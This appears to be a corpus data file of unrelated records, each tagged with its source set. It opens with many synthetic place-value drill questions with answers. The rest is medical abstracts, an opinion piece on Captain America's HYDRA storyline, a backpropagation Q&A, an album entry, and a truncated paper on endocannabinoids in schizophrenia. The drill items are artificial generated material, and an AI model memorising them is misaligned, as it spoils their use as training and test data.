What is the hundreds digit of 655?
6
What is the thousands digit of 18520?
8
What is the tens digit of 36792?
9
What is the thousands digit of 3876?
3
What is the thousands digit of 1077?
1
What is the units digit of 9213?
3
What is the hundreds digit of 422?
4
What is the tens digit of 758?
5
What is the units digit of 72462?
2
What is the thousands digit of 12468?
2
What is the units digit of 6534?
4
What is the hundreds digit of 8133?
1
What is the hundred thousands digit of 139178?
1
What is the hundreds digit of 14435?
4
What is the units digit of 218?
8
What is the units digit of 9441?
1
What is the units digit of 10405?
5
What is the units digit of 8480?
0
What is the thousands digit of 20568?
0
What is the ten thousands digit of 118762?
1
What is the ten thousands digit of 20521?
2
What is the thousands digit of 2389?
2
What is the units digit of 5840?
0
What is the hundreds digit of 3768?
7
What is the hundreds digit of 2959?
9
What is the hundreds digit of 2017?
0
What is the units digit of 25575?
5
What is the tens digit of 677?
7
What is the thousands digit of 47048?
7
What is the thousands digit of 2611?
2
What is the thousands digit of 9417?
9
What is the hundreds digit of 8250?
2
What is the thousands digit of 23467?
3
What is the tens digit of 439?
3
What is the hundreds digit of 1883?
8
What is the tens digit of 2249?
4
What is the hundreds digit of 122476?
4
What is the tens digit of 35967?
6
What is the hundreds digit of 1703?
7
What is the hundreds digit of 5401?
4
What is the thousands digit of 1910?
1
What is the units digit of 3837?
7
What is the units digit of 8150?
0
What is the thousands digit of 1305?
1
What is the thousands digit of 29831?
9
What is the tens digit of 3104?
0
What is the units digit of 1921?
1
What is the ten thousands digit of 19961?
1
What is the units digit of 89138?
8
What is the units digit of 25697?
7
What is the tens digit of 1215?
1
What is the units digit of 3769?
9
What is the thousands digit of 13762?
3
What is the units digit of 5967?
7
What is the units digit of 2351?
1
What is the hundreds digit of 2876?
8
What is the ten thousands digit of 23524?
2
What is the units digit of 14508?
8
What is the thousands digit of 1002?
1
What is the units digit of 7330?
0
What is the tens digit of 1047?
4
What is the hundreds digit of 846?
8
What is the tens digit of 932?
3
What is the ten thousands digit of 26705?
2
What is the hundreds digit of 19454?
4
What is the tens digit of 86893?
9
What is the tens digit of 2050?
5
What is the tens digit of 697?
9
What is the hundreds digit of 495?
4
What is the ten thousands digit of 15421?
1
What is the tens digit of 2374?
7
What is the units digit of 1265?
5
What is the tens digit of 27?
2
What is the units digit of 91790?
0
What is the units digit of 10504?
4
What is the hundreds digit of 1645?
6
What is the thousands digit of 5728?
5
What is the hundreds digit of 1829?
8
What is the tens digit of 5695?
9
What is the tens digit of 5505?
0
What is the hundreds digit of 14791?
7
What is the ten thousands digit of 83106?
8
What is the thousands digit of 18349?
8
What is the hundreds digit of 48696?
6
What is the tens digit of 1152?
5
What is the units digit of 18919?
9
What is the ten thousands digit of 18162?
1
What is the units digit of 10503?
3
What is the tens digit of 152014?
1
What is the units digit of 9167?
7
What is the hundreds digit of 468?
4
What is the tens digit of 12932?
3
What is the hundreds digit of 7256?
2
What is the units digit of 318?
8
What is the hundreds digit of 16481?
4
What is the units digit of 1283?
3
What is the ten thousands digit of 19304?
1
What is the tens digit of 197?
9
What is the hundreds digit of 464?
4
What is the ten thousands digit of 71246?
7
What is the hundreds digit of 448?
4
What is the units digit of 3991?
1
What is the thousands digit of 56726?
6
What is the units digit of 4260?
0
What is the units digit of 61713?
3
What is the units digit of 106379?
9
What is the hundreds digit of 695?
6
What is the thousands digit of 70012?
0
What is the tens digit of 4734?
3
What is the tens digit of 2292?
9
What is the units digit of 184?
4
What is the thousands digit of 19
|
{
"pile_set_name": "DM Mathematics"
}
|
Daily dietary copper intake in Belgium, using duplicate portion sampling.
Daily dietary copper intake in Belgium has been evaluated by duplicate portion sampling, heating in a microwave oven and atomic absorption spectrometric determination of this element. The mean intake value (1.5 +/- 0.4 mg/day) is similar to levels found for most other countries, but is situated at the lower end of the recommended range for a safe and adequate daily dietary intake.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Low-Cost Methodology for Skin Strain Measurement of a Flexed Biological Limb.
The purpose of this manuscript is to compute skin strain data from a flexed biological limb, using portable, inexpensive, and easily available resources. We apply and evaluate this approach on a person with bilateral transtibial amputations, imaging left and right residual limbs in extended and flexed knee postures. We map 3-D deformations to a flexed biological limb using freeware and a simple point-and-shoot camera. Mean principal strain, maximum shear strain, as well as lines of maximum, minimum, and nonextension are computed from 3-D digital models to inform directional mappings of the strain field for an unloaded residual limb. Peak tensile strains are ∼0.3 on the anterior surface of the knee in the proximal region of the patella, whereas peak compressive strains are ∼ -0.5 on the posterior surface of the knee. Peak maximum shear strains are ∼0.3 on the posterior surface of the knee. The accuracy and precision of this methodology are assessed for a ground-truth model. The mean point location distance is found to be 0.08 cm, and the overall standard deviation for point location difference vectors is 0.05 cm. This low-cost and mobile methodology may prove critical for applications such as the prosthetic socket interface where whole-limb skin strain data are required from patients in the field outside of traditional, large-scale clinical centers. Such data may inform the design of wearable technologies that directly interface with human skin.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Tweet
When “Captain America: Steve Rogers” #1 was released, the reaction was intense. Just after Marvel secured the superhero movie win against its rivals with Captain America: Civil War, news broke that a new series by Nick Spencer would revise the iconic hero as a secret HYDRA agent from the very start.
There are two ways to look at this situation that undermines this revision as being “true”: 1. This is just an elaborate marketing tool; 2. This is merely one of many versions of a character, and it does not override the others.
Although these are not mutually exclusive, we will treat them as separate matters.
A Marketing Plot
According to reports, the comic book publishing industry is in dire straits. Every year, press releases by distributors claim that sales are down, and doomsayers are constantly predicting the fall of a major publisher.
The industry is not in a risky place, nor will it collapse. Success should not be measured in sales figures but in stories, and readers will always turn to iconic storylines. However, the business side of the profession will always make high demands and seek to bring in an ever increasing profit. Thus, we get the false iconic story that seek to make money off of controversy rather than an honest movement in the field.
The Death of Superman story arc was extremely controversial, and it brought in a lot of interest to Superman during the 90s because it was controversial. Although it was interesting in concept, with its use of brutality and actual loss, it became just another marketing gimmick. Superman was restored in a very strained manner, and the plot line has been glossed over ever since.
It does not matter if popular demand or corporate executives were the catalyst for Superman’s return. In the end, he returned because there was a lot of profit to be made. There are many similar examples of fake storyline changes for the sake of profit, but this is the quintessential example.
It is very possible that Spencer and those at Marvel wanted to use controversy to gain sales. It is not surprising that so many websites, media groups, and high profile fans have weighed into the controversy. Free publicity is great for marketing.
Spencer also has a history of bait and switch plot lines. It is quite possible that the “Rogers is a HYDRA agent” will be reversed. A fan who dislikes what is happening can either see it as a cynical marketing ploy based on controversy, or a cynical marketing ploy based on fake controversy that will soon be reversed.
But what if this story line sticks and Rogers as HYDRA agent is deemed canonical?
There is No “Canon”
We can call it the George Lucas effect: the author’s attempt to dramatically revise a plot or story because their personal views on the matter have changed. However, once an author has published a work, they no longer have control over it; it has become part of the reader. No matter how many revised editions or later stories are published, the reader can chose to accept or dismiss at will. Some call this “head canon,” but, more appropriately, there is no “canon.”
Author’s have control over what is produced, but they can never control how a work is interpreted. Famously, William Wordsworth tried to revise many of his poems later in life to ground them more firmly in Christianity, yet most critics and readers seemed to ignore the changes. They preferred the earlier works, and the later revisions are practically unknown. The audience is firmly in control, but they seem unable to realize it.
The major problem with fan reaction in general is that everyone has their own version of a comic book hero, either based on a particular run or incarnation of the character or an amalgamation of aspects that form an idealized version. There is a whole field based on studying this reaction called Phenomenology. In general, we react poorly when the realized form of a character does not match our preconceived form. Likewise, we experience a sense of gratitude and security when the character does match.
Art has two purposes: to sooth the soul and to challenge the mind. In many instances, the two functions are in conflict with each other, which is what we are experiencing now.
When a reader begins to see the “Captain America: Steve Rogers” as Spencer’s interpretation and not the interpretation, then this conflict is eased. They can approach the work in a more objective sense and try to see the ramifications of this change. DC has a history of doing this very thing with Superman, especially in “Red Son” and “Kingdom Come.” Marvel, to a lesser extent, has their “What Ifs” and parallel universes, and Marvel NOW! has revised many storylines.
Readers should not expect continuity within a greater whole. Instead, they should focus on smaller segments, and return to those cherished storylines every now and then. Oddly, the Marvel Cinematic Universe diverged in many ways from the comics, especially with “Civil War” (as we explain here), yet there has been little outrage. The ethnicity and gender changes of a few characters have been questioned, but most fans do not care.
“Batman v Superman” did not fair so well. We’ve had many, many television and movie versions of Superman and Batman, yet fans and critics were unwilling to accept a darker version of the characters that has been very prominent in the comics since the 80’s (we touch on it here).
Either we are fine with different iconic characters being used in new and interesting ways, or we are not. It is a strange inconsistency, and it seems that Marvel is finally falling prey to it. However, it could be that Marvel is courting this inconsistency, as explained in the first point.
In the end, this is just another storyline by an author who has never been a great writer and who relies on controversy over substance. Eventually, another writer will take up the mantel of writing on Steve Rogers, and the character may go in yet another direction. That is how the industry works.
There is no reason to panic. In the end, Captain America or Steve Roger’s Captain America is not a HYDRA agent, unless you really want him to be one.
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
What's the math for real world back-propagation?
Considering a simple ANN:
$$x \rightarrow
f=(U_{m\times n}x^T)^T \rightarrow
g = g(f) \rightarrow
h = (V_{p \times m}g^T)^T \rightarrow
L = L(h,y)
$$
where $x\in\mathbb{R}^n$, $U$ and $V$ are matrices, $g$ is the point-wise sigmoid function, $L$ returns a real number indicating the loss by comparing the output $h$ with target $y$, and finally $\rightarrow$ represents data flow.
To minimize $L$ over $U$ and $V$ using gradient descent, we need to know $\frac{\partial L}{\partial U_{ij}}$ and $\frac{\partial L}{\partial V_{ij}}$, I know two ways to do this:
do the differentiation point wise, and having a hard time figuring out how to vectorize it
flatten $U$ and $V$ into a row vector, and use multivariate calculus (takes a vector, yields a vector) to do the differentiation
For the purpose of tutorial or illustration, the above two methods might be suffice, but say if you really want to implement back-prop by hand in the real world, what math will you use to do the derivative?
I mean, is there a branch, or method in meth, that teaches you how to take derivative of vector-valued function of matrices?
A:
There is Matrix Calculus, (and I would recommend the very useful Matrix Cookbook as a bookmark to keep), but for the most part, when it comes to derivatives, it just boils down to pointwise differentiation and keeping your dimensionalities in check.
You might also want to look up Autodifferentiation. This is sort of a generalisation of the Chain Rule, such that it's possible to decompose any composite function, i.e. $a(x) = f(g(x))$, and calculate the gradient of the loss with respect to $g$ as a function of the gradient of the loss with respect to $f$.
This means that for every operation in your neural network, you can give it the gradient of the operation that "consumes" it, and it'll calculate its own gradient and propagate the error backwards (hence back-propagation)
|
{
"pile_set_name": "StackExchange"
}
|
Major Arcana (album)
Major Arcana is the debut full-length studio album from the indie rock group Speedy Ortiz. It was released on July 9, 2013 by Carpark Records.
Reception
Major Arcana has received very positive reviews. The album has a score of 81 out of 100 on the review aggregate site Metacritic, based on 16 reviews.
Pitchfork Media's Lindsay Zoladz gave the album a Best New Album designation, claiming that frontwoman Sadie Dupuis "writ[es] lyrics that are actually worth poring over". David Brusie of The A.V. Club also praised the album, writing "a markedly assured debut, one that makes Speedy Ortiz an act to watch". Consequence of Sound's Katherine Flynn called the album "strong, punchy musical concentrate". Robin Smith of PopMatters described "its angular, moody ‘90s feel conjures the image of an overgrown punk hanging around a playground at night, drinking, smoking, wasting".
Pitchfork Media ranked Major Arcana #48 on its list of the top 50 albums of 2013, writing: "Speedy Ortiz strains the strangled chords and corkscrew interplay of 90s guitar heroes [...] into jaggedly axed anthem". The album was listed 31st on Stereogum's list of top 50 albums of 2013.
The song "No Below" was featured in the 2017 Square Enix/Deck Nine game Life is Strange: Before the Storm.
Track listing
All songs by Speedy Ortiz.
Charts
References
Category:2013 albums
Category:Speedy Ortiz albums
Category:Carpark Records albums
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Background
==========
The Endogenous Cannabinoid (EC) system comprises at least two cannabinoid receptors, the CB~1~and CB~2~receptors, a series of lipophilic endogenous ligands, the endocannabinoids (ECs), and enzymes for EC biosynthesis and degradation \[[@B1]\]. Mounting evidence indicates that it is involved in the physiological modulation of many crucial functions in both the peripheral and the central nervous system \[[@B1]\]. It has been hypothesized that an alteration of EC neurotransmission could play a role in neurological, psychiatric and immunological disorders \[[@B2],[@B3]\]. In this context, it is possible that, along with other neurotransmitter systems (i.e., dopaminergic, serotonergic), anomalies of the ECs might take part in producing the clinical picture of schizophrenia. This hypothesis relies on the following considerations:
1\) Subjects with acute cannabis intoxication often display a schizophrenia-like syndrome, with hallucinations, altered judgement, false beliefs, and cognitive impairment \[[@B4]\]. In other, predisposed individuals, cannabis can precipitate a psychotic illness \[[@B5]\], although this does not necessarily indicate a causative role of ECs in mental disorders. Finally, lack of motivation, apathy and avolition are almost invariably observed in long-term cannabis users, so as to mimic the picture of chronic or residual schizophrenia.
2\) Under physiological conditions, the EC system participates in the regulations of important functions, such as rest, cognition, movement, memory, and perceptions \[[@B6]\]. Many of these functions are actually altered in the course of schizophrenia.
3\) There appears to be a substantial overlap between the areas commonly believed to be involved in the pathogenesis of schizophrenia \[[@B7]\] and those expressing the highest concentrations of EC receptors in the CNS \[[@B2]\], i.e. the limbic system (hippocampus/amygdala), nigro-striatal areas, and the prefrontal cortex, among the others.
There has been evidence in the recent literature \[[@B7]-[@B9]\] that patients suffering from schizophrenia have detectable differences in their EC signalling when compared to normal controls. Leweke et al. \[[@B8]\] reported elevated levels of the endogenous cannabinoid receptor ligand anandamide \[[@B10]\] in the Cerebro-Spinal Fluid (CSF) of patients with schizophrenia. Voruganti et al. \[[@B9]\] have shown a correlation between the severity of psychotic symptoms and an increase in cannabis-induced striatal dopaminergic neurotransmission in a patient with the disorder. Finally, polymorphism of the gene encoding the CB~1~receptor, which is the cannabinoid receptor subtype mostly expressed in the brain, has been associated with increased susceptibility to hebephrenic schizophrenia \[[@B11]\], thus suggesting that a malfunctioning EC system could play a role in the etiopathogenesis of this disorder.
There have been several reports that schizophrenia is accompanied by overt alterations in the immune response, as well as by changes in the function of immune blood cells, and that many of these alterations can be normalized by anti-psychotic drugs \[\[[@B12]-[@B14]\] and \[[@B15]\] for review\]. In particular, a significantly increased number of activated macrophages and lymphocytes has been detected in the CSF of schizophrenic patients during acute psychotic episodes \[[@B16],[@B17]\]. Since activated macrophages and lymphocytes release significant amounts of ECs \[[@B18]-[@B20]\], it is possible that these blood cells contribute to some extent to the previously observed elevated levels of anandamide in the CSF of patients with a diagnosis of schizophrenia \[[@B8]\]. It is worthwhile noting that some of the immune functions previously found to be altered during acute schizophrenia, such as interleukin and tumor necrosis factor-α release, are also known to be influenced by ECs acting at both CB~1~and, particularly, CB~2~cannabinoid receptors in macrophages, lymphocytes and dendritic cells \[[@B3]\]. Notwithstanding the above observations, and despite the fact that ECs can easily cross the blood brain barrier \[[@B10]\], the levels of these compounds in the blood of schizophrenic patients have never been assessed.
Aims of the study
-----------------
We analysed the peripheral blood of patients and normal controls, in order to detect any differences in the levels of: (i) the endogenous ligands of cannabinoid receptors (the endocannabinoids, \[[@B10]\]); (ii) the cannabinoid CB~1~and CB~2~receptors, and (iii) the fatty acid amide hydrolase (FAAH), one of the enzymes mostly involved in endocannabinoid inactivation \[[@B21]\].
We report that anandamide plasma levels are elevated in untreated patients with schizophrenia, and that the amounts of this compound as well as of CB~2~receptors and FAAH are decreased after a successful pharmacological treatment.
Results
=======
Psychiatric evaluation
----------------------
Table [1](#T1){ref-type="table"} displays the data related to the BPRS total score for all the patients included in the study. In addition, the patients in subgroup 1 have been rated as ranging from moderately ill to severely ill (CGI score from 4 to 6). All patients who were reassessed showed a statistically significant difference between the pre- and post-treatment scores at the BPRS and CGI, which dropped by more than 50% in all 5 cases considered (Table [1](#T1){ref-type="table"}). Patients 3, 5 and 8 in subgroup 2 scored 1 (much improved), whereas patients 6 and 7 in the same subgroup were evaluated as moderately improved (CGI score = 2).
######
BPRS and CGI scores and anandamide blood levels of the twelve patients with schizophrenia included in this study.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**Patient Number** **Anandamide levels in the blood during the acute phase of schizophrenic illness (pmol/ml)** **Anandamide levels in the blood during remission of schizophrenic illness (pmol/ml)** **BPRS (and CGI) Scores Acute Remission**
-------------------- ---------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------- -------------------------------------------
1 11.7 59 (5)
2 7.3 64 (5)
3 8.4 4.4 68 (6) 25 (1)
4 8.2 48 (4)
5 6.3 6.2 60 (5) 20 (1)
6 5.3 2.2 66 (6) 29 (2)
7 7.7 4.1 56 (5) 26 (1)
8 6.7 2.5 70 (6) 29 (2)
9 7.5 55 (4)
10 9.7 57 (4)
11 8.7 56 (4)
12 6.0 52 (5)
**7.79 ± 0.50**\ **3.88 ± 0.72**\
**(P = 4.5 × 10^-8^*vs.*Control)** **(P = 0.16 *vs.*Control)**
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Five of these patients were assessed before and after remission of the symptoms (indicated by the significant decrease in the global BPRS and CGI scores) induced by treatment with olanzapine. CGI score ranged from 6 (severely affected) to 1 (much improved), and are shown in parentheses. The amount of anandamide in healthy volunteers (control) was 2.58 ± 0.28 pmol/ml (mean ± SEM, n = 20). Means were compared to the control by the unpaired Student\'s t test, threshold of significance was 0.95.
Anandamide, cannabinoid receptor and FAAH blood levels
------------------------------------------------------
Table [1](#T1){ref-type="table"} also shows the blood levels of anandamide in each of the twelve patients affected by schizophrenia. The mean ± SEM amounts of anandamide levels in the control volunteers and the patients with acute schizophrenia are also shown in Table [1](#T1){ref-type="table"} and in its legend. A statistically significant difference between the two groups was found, whereas the mean values for the patients in remission were not significantly different from those of the control subjects.
Clinical improvement, with the reduction in the BPRS and CGI scores, was paralleled by the decrease in both the levels of peripheral ANA (assessed in those 5 patients sampled before and after pharmacological treatment, Table [1](#T1){ref-type="table"}, Fig. [1](#F1){ref-type="fig"}) and of the intensity of the bands for the mRNA transcripts of FAAH and CB~2~(assessed in those 5 patients sampled before and after pharmacological treatment, Fig. [2](#F2){ref-type="fig"}). We did not observe any consistent difference for the CB~1~mRNA transcript, which appeared to be less expressed than that of CB~2~in all the blood samples analysed (Fig. [2b](#F2){ref-type="fig"}).
{#F1}
{ref-type="table"}), in acute phase; lanes 2, 4, 6, 8 and 10: patients n° 3, 6, 8, 5 and 7, in remission. Panel A, B, C and D are relative to PCR analysis for β~2~-microglobulin (house-keeping), CB~1~, CB~2~and FAAH, respectively. The bands shown in the figure are from 20 (Panel A), 35 (Panel B), 30 (Panel C) and 30 (Panel D) PCR amplification cycles.](1476-511X-2-5-2){#F2}
Discussion
==========
Despite several suggestions that the EC system may play a role in the pathogenesis of schizophrenia \[[@B7],[@B9],[@B22]\], and the finding of elevated levels of anandamide in the CSF of patients suffering from schizophrenia \[[@B8]\], no study has addressed so far the question of whether the EC system is also altered in the serum and mononucleated cells from the blood of patients with this mental disorder. This issue is important in view of the several immunological correlates of schizophrenia, which include, among others, a shift from a Th-1-type to a Th-2-type immune response, a significant increase of activity of blood monocytes/macrophages, and a corresponding up-regulation of cytokine release \[[@B15]\]. Indeed, the ECs have a well-established immune-modulatory effect \[[@B23],[@B24],[@B20]\]. Thus, possible changes in the blood levels of these endogenous mediators could explain in part, or be a consequence of, the modified immune response observed in the course of schizophrenia. Furthermore, since the strong impact of acute schizophrenia on some immune functions can be attenuated by treatment with anti-psychotic drugs \[[@B15],[@B25]\], the effect of antipsychotic medications on the possible modifications of the EC system in the blood of these patients also needs to be assessed.
Our study suggests the existence of a significant alteration in the peripheral blood levels of schizophrenic patients of both the endocannabinoid anandamide and the mRNA for the anandamide degrading enzyme, FAAH. Furthermore, we found that the elevation of anandamide levels in our sample is confined to the acute phases of disease, to then normalize after a successful pharmacological treatment. Eventually, there were no statistically significant differences in anandamide levels between treated patients and controls. However, no direct correlation between anandamide blood levels and the BPRS or CGI scores of each patient, be it before or after remission, was found. Our results suggest that an acute psychotic episode might be characterised, among other factors, by an elevation in the peripheral concentration of anandamide, thus possibly inducing a compensatory increased expression of the degrading enzyme, FAAH, in an attempt to normalise their circulating levels. It is of interest that our patients consistently showed the same pattern, with their level of circulating anandamide forming two well-identifiable and distinct clusters at around 8 and 3 pmol/ml for group 1 and 2, respectively. Anti-psychotic medications seem to have played a crucial role in these patients by thwarting clinical symptoms on the one hand, and, in parallel, by reducing the levels of endocannabinoids and FAAH mRNA on the other hand. We did not identify any patients failing to respond to their pharmacological treatment, although it would have been interesting to measure the concentration of anandamide in the absence of an improved clinical presentation. This event would have carried important information as to whether decreased EC concentration was related to clinical amelioration or rather to pharmacological treatment per se, regardless of clinical outcome.
The peripheral elevation of anandamide levels might be related to the hypothesized anomaly of this signalling system in the brain of patients with schizophrenia, since these compounds can easily cross the blood brain barrier \[[@B10]\]. However, it is unlikely that changes in the peripheral amounts of ECs found in the blood can reflect to a great extent alterations occurring at the CNS level, in schizophrenia as well as other neurological and psychiatric disorders, since these compounds: (i) due to their lipophilicity act as autocrine/paracrine mediators, and no blood EC carrier protein has been identified to date; and (ii) are also produced by blood cells. More probably, the changes in anandamide blood levels found here might be a consequence, or alternatively one of the causative factors, of the previously observed immunological abnormalities in patients with schizophrenia \[[@B15]\]. For example, in view of the negative effect of leptin on endocannabinoid biosynthesis \[[@B26]\], and of the reduced levels of this hormone during acute schizophrenia \[[@B27]\], it is possible that reduced leptin causes the increased levels of blood anandamide observed in the schizophrenic patients investigated in the present study. This hypothetical mechanism would explain also why olanzapine was found here to lower EC levels back to those observed in healthy volunteers, since treatment of schizophrenia with this antipsychotic drug was shown previously to restore normal serum leptin levels \[[@B28]\]. Alternatively, since antipsychotics are also known to reduce the number and/or activity of leukocytes \[[@B15]\], it is possible that the reduced levels of anandamide following olanzapine treatment are a mere consequence of the reduced activity of lymphocytes and monocytes, which are normally capable of producing anandamide only after activation \[[@B19],[@B20],[@B29]\].
Regarding the reduction, also observed here, of cannabinoid CB~2~receptor mRNA following treatment with olanzapine, again this could be a consequence of reduced activity of blood leukocytes, since also CB~2~expression has been previously shown to be subject to regulation in activated macrophages and leukocytes \[[@B3]\]. Interestingly, also the function of G-proteins in the blood has been recently shown to be down-regulated after treatment with neuroleptic drugs \[[@B30],[@B31]\], and since CB~2~is a G-protein-coupled receptor \[[@B1],[@B10]\], it is likely that the reduction of the expression of this receptor detected after treatment with olanzapine and subsequent recovery from the symptoms of schizophrenia is also accompanied by a corresponding decrease of CB~2~receptor functionality.
Clearly, blood endocannabinoids cannot be regarded yet as possible markers of acute psychotic disorders, and even less as predictors of the patients\' response to antipsychotic medication. Furthermore, we did not test the specificity of ECs alterations to schizophrenia, and it may be that other major psychoses exhibit similar biochemical aberrations, and perhaps similar stage-related fluctuations. Therefore, our data warrant further investigations with the aim of better understanding the pathological relevance of this as well as of other correlative studies.
Conclusions
===========
The present study carries the following interesting and potentially important implications:
1\) It lends further support to the hypothesis of an involvement of the EC system in schizophrenia, clearly demonstrating an anomaly in three separate components of this system, anomaly that, at least in our sample, appears to be associated with an acute phase of the illness. However, the small size of our sample warrants for great caution when interpreting these results.
2\) It suggests that at least part of the immunological abnormalities observed during acute schizophrenia might correlate with changes in the \"output\" of the EC system in the blood.
Methods
=======
Study design, subjects and psychiatric assessment and treatment
---------------------------------------------------------------
A case-control study design was used. Subjects were selected from patients treated in the clinical facilities of the Department of Mental Health in Pomigliano, Naples, Italy, from January to December 2001. Patients were selected only if showing, or described in the medical records as affected by, symptoms of schizophrenia, and if wishing to take part in the study. After this first step, the recruited subjects received a diagnostic assessment, and only those meeting the DSM-IV criteria for schizophrenia \[[@B32]\] entered the study. Other necessary criteria for inclusion were: absence of previous or present neurological disorders, no abuse of cannabis in the year preceding the study, and absence of a significant learning disability (IQ\<85). All the patients included had to be in a quite controlled setting (namely, their family environment), where no abuse of cannabis and compliance to treatment could be assessed with a high degree of certainty. These strict criteria carried inevitable reflections on the number of patients included in the study.
The individuals in our research (n = 12) were split in two subgroups. In subgroup 1 were those in an acute phase of their schizophrenic illness, who had not received pharmacological treatment for at least 30 days prior to evaluation, 9 males and 3 females, with a mean age of 32.9 ± 7.0 years (range, 18--45 years), of Caucasian race (n = 12). All individuals received the Diagnostic Interview for Genetic Studies (DIGS; \[[@B33]\]), a semi-structured DSM IV interview. All patients were rated also by means of the Clinical Global Impression scale (CGI; \[[@B34]\]), and the treatment outcome was evaluated with the CGI-Improvement (CGI-I). We used the Brief Psychiatric Rating Scale (BPRS; 18-item version; \[[@B35]\]) to characterize the severity of the symptoms of the illness, where 1 indicates absent and 7 severe.
The second subgroup (n = 5) consisted of patients previously assigned to subgroup 1, who had achieved clinical remission since at a least one month, following a successful pharmacological treatment with olanzapine (patients 3 and 5 were on 20 mg/day, whereas subjects 6, 7 and 8 received 25 mg/day). The re-test procedure for the 5 probands was performed 92 ± 11 days after the assessment in the acute phase of the illness. Clinical remission was defined a priori as at least 50% reduction on the BPRS score and a clinical evaluation of 1 (much improved) or 2 (moderately improved) at the CGI-I score. In particular, patient Nr. 3 was investigated during the third episode of her disease. She had been treated with risperidone at the onset. We switched to olanzapine because of hyperprolactinemia. Her response to treatment was satisfactory with both medications, and she always achieved a nearly complete remission. Relapses were apparently caused by an excessive reduction or a spontaneous discontinuation of her medication regime. Patient Nr. 5 was suffering from the second episode of schizophrenia. We treated her with risperidone (first episode) and then olanzapine for the episode described here. The relapse was caused by her arbitrarily stopping her medication. Patient Nr. 6 was at his first episode of schizophrenia, which however had lasted for a prolonged time because it went untreated (more than a year). In fact, his family postponed his referral to mental health facilities because of fear of stigmatization. We started him on olanzapine 20 mg/day, but he needed 25 mg to show a satisfactory response (CGI from 6 to 2). Patient Nr. 7 was experiencing several positive symptoms since two years, with serious consequences such as loss of his job. His schizophrenia did not respond to two classical antipsychotics administered by a previous psychiatrist. The initial 20 mg of olanzapine had to be titrated up to 25 to obtain the optimal response. Finally, patient Nr. 8 was treated with olanzapine since he was included in the study. He had previously not agreed to be treated, and had been suffering from several positive symptoms for approximately seven years. He only had occasional administrations of haloperidol, which was added to his food by the patient\'s wife without him being aware of that. In retrospect, there appeared to be no response because of these treatment inconsistencies.
Twenty normal controls were recruited from the medical and nursing staff at the Department of Mental Health in Pomigliano. They were in the same age range as the study patients, and were likewise comparable for level of education and gender representation. A normal IQ, absence of previous and present neurological disorders, and having not abused marijuana/exogenous cannabinoids were used as inclusion criteria for controls. The control subjects had no first-degree relative suffering from a major psychiatric disorder.
All subjects gave 10 ml blood for the laboratory testing. All blood samples were taken in the morning, from non-fasting subjects, and there were no feeding-related variables that could account for any possible difference in ECs levels between groups.
Biochemical analyses
--------------------
### Lipid Extraction
Peripheral blood samples (10 ml) were collected by vein suction in EDTA (25 mM final concentration) and processed no later than 3 hours after blood was drawn. For the LC-MS determinations, EDTA and phenyl-methyl-sulfonyl-fluoride (PMSF) (100 μM final concentration) were added to blood samples. PMSF is an inhibitor of fatty acid amide hydrolase (FAAH), and was added in order to prevent endocannabinoid degradation. Five ml of whole blood for each sample was carefully layered over 5 ml of *HISTOPAQUE*^®^1077 solution (SIGMA) in *ACCUSPIN*^®^tubes (SIGMA) and centrifuged at 400 × g for 30 min at room temperature. After centrifugation, erythrocytes and granulocytes sedimented at the bottom of the tube. After removal of the clear plasma layer from the top of the tube, the opaque layer (about 2 ml) containing the mononuclear cells was collected, resuspended by gentle aspiration in 10 ml of phosphate buffered saline (PBS) and centrifuged at 250 × g for 10 min at room temperature. The cell pellet was resuspended, washed twice in 5 ml of PBS and stored at -80°C for RNA extraction. For quantitative determinations, the plasma and the mononucleate cell layers were collected together, the proteins precipitated by adding 3 vol. of acetone, the supernatants were collected and subjected to lipid extraction with methanol/chloroform. Enough of each solvent was added to reach a final ratio buffer/methanol/chloroform of 1:1:2 (v/v/v). Methanol containing 5 pmol of d~8~-anandamide was added as internal standard. The organic phase was then dried under nitrogen and purified by means of open bed chromatography on silica gel \[[@B36],[@B37]\].
### Liquid chromatography-Atmospheric pressure chemical ionization-mass spectrometry (LC-APCI-MS) quantification of anandamide levels
The lipid extracts were analyzed by liquid chromatography-atmospheric pressure chemical ionization-mass spectrometry (LC-APCI-MS) by using a Shimadzu HPLC apparatus (LC-10ADVP) coupled to a Shimadzu (LCMS-2010) quadrupole MS via a Shimadzu APCI interface. MS analyses were carried out either in the selected ion monitoring (SIM) mode as described previously \[[@B26]\]. The temperature of the APCI source was 400°C, the HPLC column was a Phenomenex (5 μm, 150 × 4.5 mm) reverse phase column, eluted as described \[[@B37]\]. Anandamide (retention time 14.5 min) was quantified by isotope dilution with the above-mentioned deuterated standards (same retention time and *m*/*z*= 356.3) and its amounts in pmoles normalized per ml of processed blood. Intra-assay variation using this method was 2.5 ± 0.3%, whereas inter-assay variation was 10.1 ± 2.5% (means ± SEM, n = 4).
### RNA extraction and semi-quantitative reverse transcriptase-polymerase chain reaction (RT-PCR) analyses
Total RNA was extracted from mononuclear cells by Trizol^®^reagent (Life Technologies) according to the manufacturer\'s intructions. To remove contaminant DNA, 4 μg of RNA samples were DNAse-digested utilizing the DNA-free^®^(Ambion) protocol. 2 μg of total RNA were reverse transcribed in a 20 μl reaction mixture containing: 75 mM KCl, 3 mM MgCl~2~, 10 mM dithiothreitol, 1 mM dNTPs, 50 mM Tris-HCl pH 8.3, 20 units of RNAse inhibitor (Roche), 0.125 A~260~units of hexanucleotide mixture (Roche) for random-priming and 200 units of reverse transcriptase (Superscript^®^, GIBCO). The reaction mixture was incubated at room temperature for 10 minutes and at 42°C for 90 min, then the reaction was stopped by heating at 95°C for 5 min, cooled on ice, and stored to -20°C. Control samples (no-RT) were prepared by omitting reverse transcriptase in the retrotrascription mixture. DNA amplification was performed in a 50 μl PCR reaction mixture containing: 0.5--2 μl of the retro-trascription mixture, 1X PCR buffer (supplied as component of the DNA polymerase kit), 2 mM MgCl~2~, 250 μM dNTPs, 0.5 μM each of 5\' and 3\' primers and 2.5 units of *Platinum*^®^*Taq*DNA polymerase (Life Technologies). The mixtures were amplified in a PE Gene Amp PCR System 2400 thermocycler (Perkin Elmer). The primers used were: CB~1~sense primer, 5\'-CAG AAG AGC ATC ATC CAC ACG TCT G-3\'; CB~1~antisense primer 5\'-ATG CTG TTA TCC AGA GGC TGC GCA 